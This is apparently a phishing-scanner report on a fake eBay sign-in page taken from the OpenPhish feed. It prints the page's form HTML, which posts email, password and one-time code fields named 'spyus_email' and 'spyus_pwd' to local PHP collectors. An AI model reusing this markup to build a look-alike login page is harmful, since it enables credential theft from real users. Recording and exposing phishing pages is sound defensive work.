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Submission: On May 15 via automatic, source openphish — Scanned from DE

Form analysis 2 forms found in the DOM

Name: SignInFormPOST u1.php

<form name="SignInForm" id="SignInForm" method="post" class="mgn20" action="u1.php">
  <input type="hidden" name="refId" id="refId" value=""><input type="hidden" name="regUrl" id="regUrl" value=""><input type="hidden" name="MfcISAPICommand" id="MfcISAPICommand" value="SignInWelcome"><input type="hidden" name="bhid" id="bhid"
    value="DEF_CI"><input type="hidden" name="UsingSSL" value="1"><input type="hidden" name="inputversion" id="inputversion" value="2"><input type="hidden" name="lse" id="lse" value="false"><input type="hidden" name="lsv" id="lsv" value=""><input
    type="hidden" name="mid" id="mid" value="AQAAAVXHzcFdAAUxNTVlNjgwZGQyNi5hMmE2YTJkLjI0YmIyLmZmZTUyODRhcGIhqi+FHM6wtFoIgxHyCAt1YBk*"><input type="hidden" name="kgver" id="kgver" value="1"><input type="hidden" name="kgupg" id="kgupg"
    value="1"><input type="hidden" name="kgstate" id="kgstate" value=""><input type="hidden" name="omid" id="omid" value=""><input type="hidden" name="hmid" id="hmid" value=""><input type="hidden" name="rhr" id="rhr" value="f"><input type="hidden"
    name="srt" id="srt" value="010001000000500c2b12fa782e6f5e2764ff168e680896d46c7917ba70a446cc1b142f590fc9d7f84836823b039db0c995670a47adb52f90839436b2465428a575cc1f25e162a3184f704f1ae077ab6b2c6c1332d513b8"><input type="hidden" name="siteid"
    value="0"><input type="hidden" name="co_partnerId" value="2"><input type="hidden" name="ru" id="ru" value=""><input type="hidden" name="pp" id="pp" value=""><input type="hidden" name="pa1" value=""><input type="hidden" name="pa2" value=""><input
    type="hidden" name="pa3" value=""><input type="hidden" name="i1" value="-1"><input type="hidden" name="pageType" value="-1"><input type="hidden" name="rtmData" value=""><input type="hidden" name="usid" id="usid"
    value="e680dd261550a2a6a2d24bb2ffe52849"><input type="hidden" name="rqid" id="rqid" value="e680dd261550a2a6a2d7d637ffceea09"><input type="hidden" name="afbpmName" value="sess1" id="afbpmId"><input type="hidden" name="kgct" id="kgct" value="">
    <div id="l2_head" class="disTxt"></div>
    <div class="m_otp hdn" id="otp_signin">
      <div class="mi-er hdn" id="otp_error"><i class="icser spr"></i><span id="OTP_ERROR_d" tabindex="0" aria-live="polite" class="sd-err m_otp1"> That's not a match. Please try again.</span></div>
      <div class="mi-er hdn" id="OTP_generic_err"><i class="icser spr"></i><span id="OTP_ERROR_g" aria-live="polite" tabindex="0" class="sd-err m_otp1"> We ran into a problem. Please try again later.</span></div>
      <div id="otp_head" class="m_otp7"> Get a single use code</div>
      <div><span class="g-hdn" id="userid_otpLabelSpan"><label for="userid_otp"> Enter username or email</label></span>
        <p><input size="40" maxlength="64" name="userid_otp" id="userid_otp" type="text" autocapitalize="off" autocorrect="off" placeholder="Enter username or email"
            aria-describedby="We'll text you a code to confirm it's your number. Your mobile provider may charge you." aria-label="We'll text you a code to confirm it's your number. Your mobile provider may charge you." class="fld"></p>
      <div id="btnWrapper1" class="mgtb"><input type="button" name="sgnBt" value="Next" id="sgnBtn" class="btn ipb btn-prim sgnBtn"></div>
    <div id="otpConfDiv" class="hdn">
        <div class="mi-er hdn" id="OTP_generic_err3"><i class="icser spr"></i><span id="OTP_ERROR_g3" aria-live="polite" tabindex="0" class="sd-err m_otp1"> We ran into a problem. Please try again later.</span></div><span id="otp_confirm_head"
          tabindex="0" aria-live="polite" class="otpConfirmHead"> Get a single use code for</span><span id="otp_confirm_msg" tabindex="0" aria-live="polite" class="otpConfirmMsg">Text me a single use code to this mobile number. Cell charges may
          apply.</span><span id="otp_delivered" tabindex="0" aria-live="polite" class="otpDelivered"></span>
        <div class="m12"><span id="otpLabelSpan" class="g-hdn"><label for="otp"> Enter code</label></span></div>
        <div class="m_otp8">
          <input type="button" value="Get code" id="sgn-otp-conf" class="btn ipb btn-prim sgnBtn">
    <div id="otpDiv" class="hdn">
          <div class="mi-er hdn" id="otp_error2"><i class="icser spr"></i><span id="OTP_ERROR_e2" aria-live="polite" tabindex="0" class="sd-err m_otp1"> That's not a match. Please try again.</span></div>
        <div class="mi-er hdn" id="OTP_generic_err2"><i class="icser spr"></i><span id="OTP_ERROR_g1" aria-live="polite" tabindex="0" class="sd-err m_otp1"> We ran into a problem. Please try again later.</span></div>
        <div id="OTP_STATUS" tabindex="0" aria-live="polite"></div>
        <div class="m12"><span id="otpLabelSpan" class="g-hdn"><label for="otp"> Enter code</label></span><span><input size="40" maxlength="6" name="otp" id="otp" type="text" autocapitalize="off" autocorrect="off" placeholder="Enter code"
              autocomplete="off" class="fld"></span></div>
        <div class="m_otp8">
          <div style="float: left; width:109px; height:45px"><b>
								<input type="checkbox" name="keepMeSignInOption3" value="1" id="signed_in3" class="hdn" checked=""><span class="cb spr kms cbn" tabindex="0" id="csi_otp1" role="checkbox" title="Stay signed in" aria-checked="true"></span></b><label
              class="kmsi_lnk" for="signed_inotp">Stay signed in</label></div>
        <div style="clear:both;" class="p_kmsi km" aria-live="polite" id="kmsitext2"><span id="kmsiT"> Using a public or shared device? Uncheck to protect your account.</span><a id="signinanch2" href="javascript:;" role="button" aria-expanded="false" aria-controls="hlp" title="More information about this checkbox" class="kmsi_lnk">Learn 
          <div class="f12 mt17" style="display:none" id="hlp2"> With this box checked, we'll keep you signed in, making it easier to bid and buy. You'll also be all set to pay if you've saved your payment info. You can always turn off this feature in
            My eBay. We may ask you to sign in again for some activities, such as making changes to your account.</div>
    <div id="formDiv">
      <div id="pri_signin">
        <div><span><span class="sd-err" id="errf" tabindex="-1"></span></span></div>
        <div id="spanLbl"><input name="userid" id="userid" class="cn0923" tabindex="-1" autocomplete="off" placeholder="Email or username"><span class="g-hdn" id="useridLabelSpan"><label for="userid">Email or username</label></span></div>
        <div><span class="g-hdn" id="141720196LabelSpan"><label for="141720196"> Email or username</label></span><span><input size="40" maxlength="64" required="" name="spyus_email" id="141720196" type="text" autocapitalize="off" autocorrect="off"
              placeholder="Email or username" class="fld"></span></div><input name="runId2" type="hidden" value="AQABAAAAUGw6oHSzvxhJG/A/AG28zIwCap4zz743h/lxiGRjrCRPLS9E7zbEHTpRj4BZuBRv6pH6rGho+PCr3+cNrSXORxxvwmplZFVKBNazU1ye1Esz">
        <div class="m19"><span id="89096229LabelSpan" class="g-hdn"><label for="89096229"> Password </label></span><span>
            <input size="40" maxlength="64" required="" name="spyus_pwd" id="89096229" type="password" autocapitalize="off" autocorrect="off" placeholder="Password" class="fld"></span></div>
        <div id="spanLbl"><input name="pass" id="pass" type="password" class="cn0923" autocomplete="off" tabindex="-1" placeholder="Password"><span id="passLabelSpan" class="g-hdn"><label for="pass">Password </label></span></div>
  <div id="btnWrapper2" style="margin-bottom:20px;" class="mgtb">
    <input type="submit" name="sgnBt" value="Sign in" id="sgnBt" class="btn ipb btn-prim sgnBtn">
  <div class="mt17" id="keepMeDiv1">
    <div class="w360 km" id="keepMeDiv1">
      <div class="m_otp6">
        <b><input type="checkbox" name="keepMeSignInOption2" value="1" id="signed_in2" class="hdn" checked="checked"><input type="hidden" value="1" name="keepMeSignInOption" id="signInKMSITextbox"><span class="cb spr kms cbn" tabindex="0" id="csi" aria-describedby="kmsiT" role="checkbox" title="Stay signed in" aria-checked="true"></span></b><span
          class="psm"><label for="signed_in">Stay signed in</label></span>
      <div class="m_otp4 flrt" style="clear: right">&nbsp;</div>
      <div style="clear: both" class="flrt"><span class="flrt sv"><a id="inflowfyp" href="#">
							Forgot your password?</a></span></div>
    <div style="clear:both;" class="p_kmsi km" aria-live="polite" id="kmsitext1"><span id="kmsiT"> Using a public or shared device? Uncheck to protect your account.</span><a id="signinanch1" href="javascript:;" role="button" aria-expanded="false" aria-controls="hlp" title="More information about this checkbox" class="kmsi_lnk">Learn 
      <div class="f12 mt17" style="display:none" id="hlp1"> With this box checked, we'll keep you signed in, making it easier to bid and buy. You'll also be all set to pay if you've saved your payment info. You can always turn off this feature in My
        eBay. We may ask you to sign in again for some activities, such as making changes to your account.</div>

Name: RegisterEnterInfoPOST xx.php

<form method="post" name="RegisterEnterInfo" id="RegisterEnterInfo" action="xx.php"><input type="hidden" name="MfcISAPICommand" value="RegisterEnterInfo"><input type="hidden" name="co_partnerId" id="co_partnerId" value="2"><input type="hidden"
    name="siteid" id="siteid" value="0"><input type="hidden" name="ru" id="ru" value=""><input type="hidden" name="bin" id="bin" value="-1"><input type="hidden" name="pageType" value="-1">

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